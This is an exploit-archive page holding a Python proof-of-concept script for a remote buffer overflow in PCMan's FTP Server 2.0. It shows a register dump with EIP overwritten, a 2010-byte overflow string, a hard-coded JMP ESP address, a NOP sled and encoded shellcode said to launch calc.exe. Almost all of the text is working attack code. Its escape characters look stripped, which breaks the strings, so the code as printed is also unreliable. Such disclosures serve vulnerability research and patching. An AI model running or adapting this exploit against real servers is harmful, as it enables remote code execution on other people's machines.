PCMan's FTP Server 2.0 Buffer Overflow

Posted on 28 June 2013
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
# EAX 00000000
# ECX 00830A70
# EDX 00000030
# EBX 00000000
# ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 01F214A0
# ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################

import socket
import sys

USER = "anonymous"
PASSWD = "TEST"

PAYLOAD = "x41" * 2010
EIP = "xDBxFCx1Cx75" # 751CFCDB JMP ESP USER32.DLL
NOP = "x90" * 10

#OPENS a calc.exe UP
SHELLCODE =(
 "xbax38xdcx15x77xddxc7xd9x74x24xf4x5dx33xc9"
 "xb1x33x83xc5x04x31x55x0ex03x6dxd2xf7x82x71"
 "x02x7ex6cx89xd3xe1xe4x6cxe2x33x92xe5x57x84"
 "xd0xabx5bx6fxb4x5fxefx1dx11x50x58xabx47x5f"
 "x59x1dx48x33x99x3fx34x49xcex9fx05x82x03xe1"
 "x42xfexecxb3x1bx75x5ex24x2fxcbx63x45xffx40"
 "xdbx3dx7ax96xa8xf7x85xc6x01x83xcexfex2axcb"
 "xeexffxffx0fxd2xb6x74xfbxa0x49x5dx35x48x78"
 "xa1x9ax77xb5x2cxe2xb0x71xcfx91xcax82x72xa2"
 "x08xf9xa8x27x8dx59x3ax9fx75x58xefx46xfdx56"
 "x44x0cx59x7ax5bxc1xd1x86xd0xe4x35x0fxa2xc2"
 "x91x54x70x6ax83x30xd7x93xd3x9cx88x31x9fx0e"
 "xdcx40xc2x44x23xc0x78x21x23xdax82x01x4cxeb"
 "x09xcex0bxf4xdbxabxe4xbex46x9dx6cx67x13x9c"
 "xf0x98xc9xe2x0cx1bxf8x9axeax03x89x9fxb7x83"
 "x61xedxa8x61x86x42xc8xa3xe5x05x5ax2fxc4xa0"
 "xdaxcax18");

print("

[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako


")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))
data = s.recv(1024)

print("[-] Login to FTP Server...
")
s.send("USER " + USER + '
')
data = s.recv(1024)

s.send("PASS " + PASSWD + '
')
data = s.recv(1024)

print("[-] Sending exploit...
")
s.send(PAYLOAD + EIP + NOP +SHELLCODE +'
')
s.close()

print("[!] Done! Exploit successfully sent
")
TOP
Malware :

None in database
Last 20
Exploits :

Last 20